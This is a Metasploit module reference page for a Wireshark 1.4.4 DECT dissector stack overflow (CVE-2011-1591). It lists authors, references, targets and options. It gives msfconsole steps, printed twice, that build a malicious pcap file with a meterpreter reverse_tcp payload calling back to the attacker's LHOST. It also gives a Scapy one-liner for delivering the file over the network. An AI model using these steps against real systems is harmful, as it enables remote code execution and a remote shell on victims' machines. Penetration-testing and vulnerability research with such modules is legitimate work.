Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)
This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap("file"))
Exploit Rank
- Good
Exploit Authors
- Paul Makowski < >
- sickness < >
- corelanc0d3r < peter.ve [at] corelan.be >
Vulnerability References
- CVE-2011-1591
- OSVDB-71848
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
- EDB-17185
Exploit Targets
- 0 - Win32 Universal (Generic DEP & ASLR Bypass) (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > show payloads
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(wireshark_packet_dect) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_packet_dect) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > show payloads
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(wireshark_packet_dect) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_packet_dect) > exploit
Exploit Module Options
| FILENAME | pcap file (default: passwords.pcap) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
